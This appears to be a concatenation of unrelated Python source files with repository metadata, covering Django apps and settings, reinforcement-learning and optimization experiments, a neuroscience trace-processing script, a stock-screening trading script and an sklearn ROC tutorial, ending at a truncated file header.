| 2021-01-18T02:21:44.654598 | 2015-03-21T14:09:56 | 2015-03-21T14:09:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 526 |
py
|
# -*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.views.decorators.http import require_POST
from template_dynamicloader.forms import ChangeTemplateHiddenForm
from template_dynamicloader.utils import switch_template
@require_POST
def change(request):
form = ChangeTemplateHiddenForm(request.POST)
if form.is_valid() and 'change_style' in request.POST:
switch_template(request, **form.cleaned_data)
return HttpResponseRedirect(reverse('home'))
|
[
"[email protected]"
] | |
6a138ba973cb0c3445c9e304eb69802cea8a51f1
|
34b76d94ff323e65e76be9bef71379e73046ad1f
|
/sacred_runs_final/_sources/run_sacred_926b2f1738101acc8665dff2324ae499.py
|
44541df559402ca43e56054e8681d454cc6dacc7
|
[
"MIT"
] |
permissive
|
lorelupo/baselines
|
5324e3f05615789608e6119ae7395b77973cbe8c
|
8b6df664ecb714e77703f8fd9c7ea3841048bb28
|
refs/heads/master
| 2020-04-29T20:19:34.256241 | 2019-02-28T19:18:21 | 2019-02-28T19:18:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,135 |
py
|
#!/usr/bin/env python3
# noinspection PyUnresolvedReferences
'''
This script runs rllab or gym environments. To run RLLAB, use the format
rllab.<env_name> as env name, otherwise gym will be used.
export SACRED_RUNS_DIRECTORY to log sacred to a directory
export SACRED_SLACK_CONFIG to use a slack plugin
'''
# Common imports
import sys, re, os, time, logging
from collections import defaultdict
# Framework imports
import gym
import tensorflow as tf
# Self imports: utils
from baselines.common import set_global_seeds
from baselines import logger
import baselines.common.tf_util as U
from baselines.common.rllab_utils import Rllab2GymWrapper, rllab_env_from_name
from baselines.common.atari_wrappers import make_atari, wrap_deepmind
from baselines.common.parallel_sampler import ParallelSampler
from baselines.common.cmd_util import get_env_type
# Self imports: algorithm
from baselines.policy.mlp_policy import MlpPolicy
from baselines.policy.cnn_policy import CnnPolicy
from baselines.pois import pois
# Sacred
from sacred import Experiment
from sacred.observers import FileStorageObserver, SlackObserver
# Create experiment, assign the name if provided in env variables
if os.environ.get('EXPERIMENT_NAME') is not None:
ex = Experiment(os.environ.get('EXPERIMENT_NAME'))
else:
ex = Experiment('POIS')
# Set a File Observer
if os.environ.get('SACRED_RUNS_DIRECTORY') is not None:
print("Sacred logging at:", os.environ.get('SACRED_RUNS_DIRECTORY'))
ex.observers.append(FileStorageObserver.create(os.environ.get('SACRED_RUNS_DIRECTORY')))
if os.environ.get('SACRED_SLACK_CONFIG') is not None:
print("Sacred is using slack.")
ex.observers.append(SlackObserver.from_config(os.environ.get('SACRED_SLACK_CONFIG')))
@ex.config
def custom_config():
seed = 0
env = 'rllab.cartpole'
num_episodes = 100
max_iters = 500
horizon = 500
iw_method = 'is'
iw_norm = 'none'
natural = False
file_name = 'progress'
logdir = 'logs'
bound = 'max-d2'
delta = 0.99
njobs = -1
save_weights = False
policy = 'nn'
policy_init = 'xavier'
max_offline_iters = 10
gamma = 1.0
center = False
clipping = False
entropy = 'none'
reward_clustering = 'none'
positive_return = False
experiment_name = None
# ENTROPY can be of 4 schemes:
# - 'none': no entropy bonus
# - 'step:<height>:<duration>': step function which is <height> tall for <duration> iterations
# - 'lin:<max>:<min>': linearly decreasing function from <max> to <min> over all iterations, clipped to 0 for negatives
# - 'exp:<height>:<scale>': exponentially decreasing curve <height> tall, use <scale> to make it "spread" more
# REWARD_CLUSTERING can be of 4 schemes:
# - 'none': do nothing
# - 'manual:<N>:<min>:<max>': N classes between min and max
# - 'global:<N>': N classes over global min and max (as seen so far)
# - 'batch:<N>': N classes over batch min and max (as seen so far)
# TODO: quantiles discretization?
# Create the filename
if file_name == 'progress':
file_name = '%s_iw=%s_bound=%s_delta=%s_gamma=%s_center=%s_entropy=%s_seed=%s_%s' % (env.upper(), iw_method, bound, delta, gamma, center, entropy, seed, time.time())
else:
file_name = file_name
def train(env, policy, policy_init, n_episodes, horizon, seed, njobs=1, save_weights=False, **alg_args):
if env.startswith('rllab.'):
# Get env name and class
        env_name = re.match(r'rllab\.(\S+)', env).group(1)
env_rllab_class = rllab_env_from_name(env_name)
# Define env maker
def make_env():
env_rllab = env_rllab_class()
_env = Rllab2GymWrapper(env_rllab)
return _env
# Used later
env_type = 'rllab'
else:
# Normal gym, get if Atari or not.
env_type = get_env_type(env)
assert env_type is not None, "Env not recognized."
# Define the correct env maker
if env_type == 'atari':
# Atari, custom env creation
def make_env():
_env = make_atari(env)
return wrap_deepmind(_env)
else:
# Not atari, standard env creation
def make_env():
env_rllab = gym.make(env)
return env_rllab
if policy == 'linear':
hid_size = num_hid_layers = 0
elif policy == 'nn':
hid_size = [100, 50, 25]
num_hid_layers = 3
if policy_init == 'xavier':
policy_initializer = tf.contrib.layers.xavier_initializer()
elif policy_init == 'zeros':
policy_initializer = U.normc_initializer(0.0)
else:
raise Exception('Unrecognized policy initializer.')
if policy == 'linear' or policy == 'nn':
def make_policy(name, ob_space, ac_space):
return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
hid_size=hid_size, num_hid_layers=num_hid_layers, gaussian_fixed_var=True, use_bias=False, use_critic=False,
hidden_W_init=policy_initializer, output_W_init=policy_initializer)
elif policy == 'cnn':
def make_policy(name, ob_space, ac_space):
return CnnPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
gaussian_fixed_var=True, use_bias=False, use_critic=False,
hidden_W_init=policy_initializer,
output_W_init=policy_initializer)
else:
raise Exception('Unrecognized policy type.')
sampler = ParallelSampler(make_policy, make_env, n_episodes, horizon, True, n_workers=njobs, seed=seed)
try:
affinity = len(os.sched_getaffinity(0))
    except AttributeError:  # os.sched_getaffinity is not available on all platforms
affinity = njobs
sess = U.make_session(affinity)
sess.__enter__()
set_global_seeds(seed)
gym.logger.setLevel(logging.WARN)
pois.learn(make_env, make_policy, n_episodes=n_episodes, horizon=horizon,
sampler=sampler, save_weights=save_weights, **alg_args)
sampler.close()
@ex.automain
def main(seed, env, num_episodes, horizon, iw_method, iw_norm, natural,
file_name, logdir, bound, delta, njobs, save_weights, policy,
policy_init, max_offline_iters, gamma, center, clipping, entropy,
max_iters, positive_return, reward_clustering, _run):
logger.configure(dir=logdir, format_strs=['stdout', 'csv', 'tensorboard', 'sacred'], file_name=file_name, run=_run)
train(env=env,
policy=policy,
policy_init=policy_init,
n_episodes=num_episodes,
horizon=horizon,
seed=seed,
njobs=njobs,
save_weights=save_weights,
max_iters=max_iters,
iw_method=iw_method,
iw_norm=iw_norm,
use_natural_gradient=natural,
bound=bound,
delta=delta,
gamma=gamma,
max_offline_iters=max_offline_iters,
center_return=center,
clipping=clipping,
entropy=entropy,
reward_clustering=reward_clustering)
|
[
"[email protected]"
] | |
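The config comments in the previous file encode entropy schedules as strings such as `'step:<height>:<duration>'`. One way such strings could be decoded into a per-iteration coefficient (an illustrative sketch, not the repository's actual parser):

```python
import math

def entropy_coef(spec, it, max_iters):
    """Illustrative decoder for the schedule strings described above."""
    if spec == 'none':
        return 0.0
    kind, a, b = spec.split(':')
    a, b = float(a), float(b)
    if kind == 'step':   # <height> tall for the first <duration> iterations
        return a if it < b else 0.0
    if kind == 'lin':    # linear from <max> to <min>, clipped to 0 for negatives
        return max(0.0, a + (b - a) * it / max_iters)
    if kind == 'exp':    # <height> tall; <scale> spreads the decay
        return a * math.exp(-it / b)
    raise ValueError(spec)
```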
b25ce7f623ec6fdde3d149c689911c96dd5e5206
|
471763d760e57f0487d5f032d261674c6fb732c8
|
/pymoo/experimental/my_test.py
|
c374176b5538cd3516ee40931e823ed8ac6f23c1
|
[
"Apache-2.0"
] |
permissive
|
s-m-amin-ghasemi/pymoo
|
7b583834d2f6dea26592001eb59e45472dadd490
|
74123484b0f72d601823bcda56f9526ad12e751a
|
refs/heads/master
| 2020-05-02T09:55:31.641675 | 2019-03-04T19:24:37 | 2019-03-04T19:24:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 799 |
py
|
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.optimize import minimize
from pymoo.util import plotting
from pymoo.util.reference_direction import UniformReferenceDirectionFactory
from pymop.factory import get_problem
problem = get_problem("dtlz1", n_var=7, n_obj=3)
ref_dirs = UniformReferenceDirectionFactory(3, n_points=91).do()
pf = problem.pareto_front(ref_dirs)
res = minimize(problem,
method='nsga3',
method_args={
'pop_size': 92,
'ref_dirs': ref_dirs},
termination=('n_gen', 400),
pf=pf,
seed=1,
disp=True)
plotting.plot(res.F)
|
[
"[email protected]"
] | |
192816a0aa4248471ba63ca120bc57733699c6ee
|
4852046aed2588c7a359c4b805251fa953399b23
|
/web/urls.py
|
bd18502d943190273fbe1e27349abd18c0f82e9d
|
[] |
no_license
|
enasmohmed/Mobily-WebSite
|
8cc11cc0e31d78da85029e8885c56b4ecc4d1e33
|
dbab598ca36ccbadb15e37199b719b618b5c11f9
|
refs/heads/master
| 2020-08-08T12:08:23.169066 | 2019-10-26T20:24:51 | 2019-10-26T20:24:51 | 213,828,626 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,532 |
py
|
"""web URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
import Run
from Run import views
app_name = 'Run'
urlpatterns = [
path('admin/', admin.site.urls),
path('', Run.views.HomePageView, name='home'),
path('', include('Run.urls', namespace='Run')),
path('accounts/', include('accounts.urls', namespace='accounts')),
path('NewProduct/', include('NewProduct.urls', namespace='NewProduct')),
path('ckeditor/', include('ckeditor_uploader.urls')),
path('contact', Run.views.ContactUs, name='contact'),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL ,document_root=settings.STATIC_ROOT)
|
[
"[email protected]"
] | |
a33f00ae4c2d0a44e8d884798cff5199cbd63b9e
|
b4914b08ce57707a4f663403566b4e8e9b68d9a0
|
/hofvideos/settings.py
|
cd8023eb92ad11c2702bd1d251e7218271c4a589
|
[] |
no_license
|
Harshvartak/halloffamevids
|
9d47521ac9cafbcc1bbb8f049e64765d300bbf6c
|
89bd7d3890feecd67ba293b0ab8d62ced491d025
|
refs/heads/master
| 2022-12-09T10:57:47.856072 | 2019-09-26T19:31:56 | 2019-09-26T19:31:56 | 211,171,960 | 0 | 0 | null | 2022-12-08T06:38:36 | 2019-09-26T20:02:38 |
JavaScript
|
UTF-8
|
Python
| false | false | 3,326 |
py
|
"""
Django settings for hofvideos project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '198eoywsu)$@msv6jhixb$%tc3ruj83aq()oloy39(eiaw1za2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL= 'dashboard'
LOGOUT_REDIRECT_URL= 'home'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'halls',
'widget_tweaks',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hofvideos.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hofvideos.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT= os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_ROOT=os.path.join(BASE_DIR, 'media')
MEDIA_URL='/media/'
|
[
"[email protected]"
] | |
825e5b112be413802be4e582a733b67f276cf6ad
|
1ceb35da7b1106a4da4e8a3a5620d23a326a68e4
|
/corticalmapping/scripts/post_recording/00_old/movie_multi_plane_single_channel_deepscope/within_plane_folder/090_get_neuropil_subtracted_traces.py
|
551768f06dbf818c36c61b57bb1068b0fc1d1578
|
[] |
no_license
|
zhuangjun1981/corticalmapping
|
c3870a3f31ed064d77f209a08e71f44c375676a3
|
0ddd261b3993f5ce5608adfbd98a588afc56d20c
|
refs/heads/master
| 2022-11-14T03:24:53.443659 | 2020-07-13T23:48:50 | 2020-07-13T23:48:50 | 84,975,797 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
import sys
import os
import h5py
import numpy as np
import corticalmapping.HighLevel as hl
import corticalmapping.core.FileTools as ft
import matplotlib.pyplot as plt
lam = 1. # 100.
plot_chunk_size = 5000
def plot_traces_chunks(traces, labels, chunk_size, roi_ind):
    """
    Plot traces in consecutive time chunks, one subplot per chunk.

    :param traces: np.array, shape=[trace_type, t_num]
    :param labels: legend label for each trace type
    :param chunk_size: number of timepoints shown per subplot
    :param roi_ind: ROI index, used in the figure title
    :return: the matplotlib figure
    """
t_num = traces.shape[1]
chunk_num = t_num // chunk_size
chunks = []
for chunk_ind in range(chunk_num):
chunks.append([chunk_ind * chunk_size, (chunk_ind + 1) * chunk_size])
if t_num % chunk_size != 0:
chunks.append([chunk_num * chunk_size, t_num])
v_max = np.amax(traces)
v_min = np.amin(traces)
fig = plt.figure(figsize=(75, 20))
fig.suptitle('neuropil subtraction for ROI: {}'.format(roi_ind))
for chunk_ind, chunk in enumerate(chunks):
curr_ax = fig.add_subplot(len(chunks), 1, chunk_ind + 1)
for trace_ind in range(traces.shape[0]):
curr_ax.plot(traces[trace_ind, chunk[0]: chunk[1]], label=labels[trace_ind])
curr_ax.set_xlim([0, chunk_size])
curr_ax.set_ylim([v_min, v_max * 1.2])
curr_ax.legend()
return fig
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
data_f = h5py.File('rois_and_traces.hdf5')
traces_raw = data_f['traces_center_raw'].value
traces_surround = data_f['traces_surround_raw'].value
traces_subtracted = np.zeros(traces_raw.shape, np.float32)
ratio = np.zeros(traces_raw.shape[0], np.float32)
err = np.zeros(traces_raw.shape[0], np.float32)
for i in range(traces_raw.shape[0]):
curr_trace_c = traces_raw[i]
    curr_trace_s = traces_surround[i]
curr_r, curr_err, curr_trace_sub = hl.neural_pil_subtraction(curr_trace_c, curr_trace_s, lam=lam)
print "roi_%s \tr = %.4f; error = %.4f." % (ft.int2str(i, 5), curr_r, curr_err)
traces_subtracted[i] = curr_trace_sub
ratio[i] = curr_r
err[i] = curr_err
print('\nplotting neuropil subtraction results ...')
figures_folder = 'figures/neuropil_subtraction_lam_{}'.format(lam)
if not os.path.isdir(figures_folder):
os.makedirs(figures_folder)
for roi_ind in range(traces_raw.shape[0]):
print('roi_{:04d}'.format(roi_ind))
    curr_traces = np.array([traces_raw[roi_ind], traces_surround[roi_ind], traces_subtracted[roi_ind]])
curr_fig = plot_traces_chunks(traces=curr_traces,
labels=['center', 'surround', 'subtracted'],
chunk_size=plot_chunk_size,
roi_ind=roi_ind)
curr_fig.savefig(os.path.join(figures_folder, 'neuropil_subtraction_ROI_{:04d}.png'.format(roi_ind)))
curr_fig.clear()
plt.close(curr_fig)
# wait for keyboard abortion
msg = raw_input('Do you want to save? (y/n)\n')
while True:
if msg == 'y':
break
elif msg == 'n':
sys.exit('Stop process without saving.')
else:
msg = raw_input('Do you want to save? (y/n)\n')
data_f['traces_center_subtracted'] = traces_subtracted
data_f['neuropil_r'] = ratio
data_f['neuropil_err'] = err
data_f.close()
|
[
"[email protected]"
] | |
bf50004145bd6d307ec066d1ad0794c4877ad04b
|
849f05421d6becc6c9da70cb077dc356c3b4af0b
|
/addphoto/migrations/0002_auto_20200301_1602.py
|
1aa115012e6672cc5efaab5d54635095ea376dff
|
[] |
no_license
|
microStationCorp/faceshot
|
63d632ff07b71c24b65577c926a28beb0e6ebd89
|
451e1a19f56a0da84f6290b2d6d15c0d8e60cb92
|
refs/heads/master
| 2021-02-06T20:08:35.427105 | 2020-03-03T07:16:25 | 2020-03-03T07:16:25 | 243,944,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 410 |
py
|
# Generated by Django 3.0.3 on 2020-03-01 10:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('addphoto', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='uploadedphoto',
name='image',
field=models.ImageField(max_length=1, upload_to='get_image_path'),
),
]
|
[
"[email protected]"
] | |
7d503436d2d772f337fa170b88ce13e1e6d851f4
|
d87483a2c0b50ed97c1515d49d62c6e9feaddbe0
|
/.history/buy_top_fc_smart_20210204001749.py
|
e28c6f69964eb4311396f03581510b45098e4b0e
|
[
"MIT"
] |
permissive
|
HopperKremer/hoptrader
|
0d36b6e33922414003cf689fb81f924da076a54b
|
406793c10bc888648290fd15c7c2af62cf8c6c67
|
refs/heads/main
| 2023-06-12T15:51:00.910310 | 2021-07-06T16:15:41 | 2021-07-06T16:15:41 | 334,754,936 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,730 |
py
|
# Buy top tickers from Financhill
import requests
from tda import auth, client
from tda.orders.equities import equity_buy_market, equity_buy_limit
from tda.orders.common import Duration, Session
import tda
import os, sys
import time
from selenium import webdriver
import json
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
import config # stored in parent directory for security
token_path = "token"
DRIVER_PATH = "/home/hopper/chromedriver"
driver = webdriver.Chrome(DRIVER_PATH)
redirect_uri = "https://localhost"
try:
c = auth.client_from_token_file(token_path, config.api_key)
except FileNotFoundError:
c = auth.client_from_login_flow(driver, config.api_key, redirect_uri, token_path)
# All this scraping code works
driver.get("https://financhill.com/screen/stock-score")
time.sleep(2)
driver.find_element_by_css_selector(
'span[data-sort-name="stock_score_normalized"]'
).click()
time.sleep(2)
tickers = driver.find_elements_by_tag_name("td")
positions = c.get_account(config.tda_acct_num, c.Account.Fields.POSITIONS)
print(positions)
# i = 0
# [0]:Ticker, [1]:Share Price, [2]:Rating, [3]:Score, [4]:Rating Change Date, [5]:Price Change %
# while i < 40:
# print(len(tickers))
# ticker = str(tickers[i].text)
# print(ticker)
# share_price = float(tickers[i + 1].text)
# # How many dollars of each stock to buy:
# desired_dollar_amount = 1000
# num_shares = round(desired_dollar_amount / share_price)
# print(num_shares)
# order = equity_buy_market(ticker, 1)
# r = c.place_order(config.tda_acct_num, order)
# time.sleep(2)
# print(r.status_code)
# i += 10
driver.quit()
|
[
"[email protected]"
] | |
aebd77ff3c559266ef4a5dce4c44cbc2bda85af3
|
ce972e94fcdf19d6809d94c2a73595233d1f741d
|
/catkin_ws/build/turtlebot_gazebo/catkin_generated/pkg.develspace.context.pc.py
|
76fa70e69fef0fcfde19f495cc341709a0f0e080
|
[] |
no_license
|
WilliamZipanHe/reward_shaping_ttr
|
cfa0e26579f31837c61af3e09621b4dad7eaaba2
|
df56cc0153147bb067bc3a0eee0e1e4e1044407f
|
refs/heads/master
| 2022-02-23T05:02:00.120626 | 2019-08-07T21:52:50 | 2019-08-07T21:52:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 410 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot_gazebo"
PROJECT_SPACE_DIR = "/local-scratch/xlv/catkin_ws/devel/.private/turtlebot_gazebo"
PROJECT_VERSION = "2.2.3"
|
[
"[email protected]"
] | |
3484f514f3efa0f801ae3310b219f4923b7b871b
|
a98899845ed5dc112f50e2824082c8dc49941ed8
|
/project/api/migrations/0033_session_is_invitational.py
|
824057127393ceff2fd50eef9202d4ffbb3b6438
|
[
"BSD-2-Clause"
] |
permissive
|
talexb/barberscore-api
|
9d6c48eca5233b530e2c02251b004b0b1d72c429
|
2320a75d9b49368f5eb1e00e5e5f32f5c79484a1
|
refs/heads/master
| 2021-01-15T11:57:34.970439 | 2017-08-07T14:42:57 | 2017-08-07T14:42:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-18 03:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0032_person_last_name'),
]
operations = [
migrations.AddField(
model_name='session',
name='is_invitational',
field=models.BooleanField(default=False),
),
]
|
[
"[email protected]"
] | |
81e6a970b801ccc37420106f206135876a43bc0c
|
108cc1350623d1a30c3e08f357267e516f254ae9
|
/test/test_sgd_classifier.py
|
245f73242df189c623eae7a1182296f5e0ab0fdb
|
[
"CC-BY-SA-4.0",
"Apache-2.0"
] |
permissive
|
agoyal3/cs224u
|
1afd02948f5abb08636d599c4a9266c2cb5d7447
|
f565857a79f09be1b8cfb5c76f8d5731e159939f
|
refs/heads/master
| 2023-08-11T21:15:25.947141 | 2021-09-24T07:05:05 | 2021-09-24T07:05:05 | 401,109,252 | 0 | 0 |
Apache-2.0
| 2021-09-07T20:49:11 | 2021-08-29T18:04:38 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,453 |
py
|
import pytest
from sklearn.datasets import load_digits
from sklearn.metrics import accuracy_score
from sklearn.model_selection import RandomizedSearchCV, cross_validate
from sklearn.model_selection import train_test_split
import utils
from np_sgd_classifier import BasicSGDClassifier
from np_sgd_classifier import simple_example
__author__ = "Christopher Potts"
__version__ = "CS224u, Stanford, Spring 2021"
utils.fix_random_seeds()
PARAMS_WITH_TEST_VALUES = [
['max_iter', 10],
['max_iter', 0],
['eta', 0.02]]
@pytest.fixture
def digits():
digits = load_digits()
X = digits.data
y = digits.target
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
return X_train, X_test, y_train, y_test
def test_model():
f1 = simple_example()
assert f1 >= 0.89
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_params(param, expected):
mod = BasicSGDClassifier(**{param: expected})
result = getattr(mod, param)
assert result == expected
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_simple_example_params(digits, param, expected):
X_train, X_test, y_train, y_test = digits
mod = BasicSGDClassifier(**{param: expected})
mod.fit(X_train, y_train)
preds = mod.predict(X_test)
acc = accuracy_score(y_test, preds)
if not (param == "max_iter" and expected <= 1):
assert acc >= 0.90
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_parameter_setting(param, expected):
mod = BasicSGDClassifier()
mod.set_params(**{param: expected})
result = getattr(mod, param)
assert result == expected
def test_hyperparameter_selection(digits):
X_train, X_test, y_train, y_test = digits
param_grid = {'eta': [0.02, 0.03]}
mod = BasicSGDClassifier(max_iter=5)
xval = RandomizedSearchCV(mod, param_grid, cv=2)
xval.fit(X_train, y_train)
def test_cross_validation_sklearn(digits):
X_train, X_test, y_train, y_test = digits
mod = BasicSGDClassifier(max_iter=5)
xval = cross_validate(mod, X_train, y_train, cv=2)
def test_cross_validation_nlu(digits):
X_train, X_test, y_train, y_test = digits
param_grid = {'eta': [0.02, 0.03]}
mod = BasicSGDClassifier(max_iter=2)
best_mod = utils.fit_classifier_with_hyperparameter_search(
X_train, y_train, mod, cv=2, param_grid=param_grid)
|
[
"[email protected]"
] | |
b947ef80ac45577d2b326521537502f06ee36992
|
c981bbd7434b814f7968b9ba0e2235f82d7874b4
|
/Modellbewertung und Hyperparamter-Abstimmung/roc_curve.py
|
965aee0f54da0a3269c211ea4d38a0b7714aeadd
|
[] |
no_license
|
foxriver76/MachineLearningRaschka
|
e1ef187f5b2b7b9d8f4edf834451e1aa5f6b9d70
|
a2940fa6c187a5223fcc789d8a7f1ccb5d7dc3e2
|
refs/heads/master
| 2021-03-27T11:53:44.684929 | 2018-05-13T09:03:20 | 2018-05-13T09:03:20 | 104,927,632 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,194 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 31 12:13:57 2017
@author: moritz
"""
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler, LabelEncoder
from sklearn.model_selection import train_test_split, StratifiedKFold
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve, auc, roc_auc_score, accuracy_score, \
make_scorer, precision_score
from scipy import interp
from sklearn.decomposition import PCA
from sklearn.linear_model import LogisticRegression
import numpy as np
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-' \
'databases/breast-cancer-wisconsin/wdbc.data', header=None)
X = df.loc[:, 2:].values
y = df.loc[:, 1].values
le = LabelEncoder()
y = le.fit_transform(y)
X_train, X_test, y_train, y_test = \
train_test_split(X, y, test_size=0.2, random_state=1)
"""Logistic Regression Pipeline"""
pipe_lr = Pipeline([('scl', StandardScaler()),
('pca', PCA(n_components=2)),
('clf', LogisticRegression(penalty='l2',
random_state=0,
C=100.0))])
X_train2 = X_train[:, [4, 14]]
cv = list(StratifiedKFold(n_splits=3,
random_state=1).split(X_train, y_train))
fig = plt.figure(figsize=(7, 5))
mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
all_tpr = []
for i, (train, test) in enumerate(cv):
probas = pipe_lr.fit(X_train2[train],
y_train[train]).predict_proba(X_train2[test])
fpr, tpr, thresholds = roc_curve(y_train[test],
probas[:, 1],
pos_label=1)
mean_tpr += interp(mean_fpr, fpr, tpr)
mean_tpr[0] = 0.0
roc_auc = auc(fpr, tpr)
plt.plot(fpr,
tpr,
lw=1,
         label='ROC fold %d (area = %0.2f)'
% (i+1, roc_auc))
plt.plot([0,1],
[0, 1],
linestyle='--',
color = (0.6, 0.6, 0.6),
         label='Random guessing')
mean_tpr /= len(cv)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, 'k--',
         label='Mean ROC (area = %0.2f)'
% mean_auc, lw=2)
plt.plot([0, 0, 1],
[0, 1, 1],
lw=2,
linestyle=':',
color='black',
         label='Perfect performance')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc='lower right')
plt.show()
"""Wenn nur ROC Fläche interessant, dann:"""
pipe_lr = pipe_lr.fit(X_train2, y_train)
y_pred2 = pipe_lr.predict(X_test[:, [4, 14]])
print('ROC AUC: %.3f'
% roc_auc_score(y_true=y_test, y_score=y_pred2))
print('Accuracy: %.3f'
% accuracy_score(y_true=y_test, y_pred=y_pred2))
"""Für Multiklassen-Klassifizierung:"""
pre_scorer = make_scorer(score_func=precision_score,
pos_label=1,
greater_is_better=True,
average='micro')
|
[
"[email protected]"
] | |
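One portability note on the file above: `scipy.interp` was only ever a re-export of NumPy's interpolation routine and has been removed from recent SciPy releases; `np.interp` is the drop-in replacement:

```python
import numpy as np

# Replaces `from scipy import interp` on current SciPy stacks:
mean_tpr += np.interp(mean_fpr, fpr, tpr)
```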
5c1b7a79524ef0a7a58892297255840adff3bca9
|
aa13e1d93b7a8017e1e610a900bd05f6df91604f
|
/codechef/contests/APRIL17/SMARKET/test.py
|
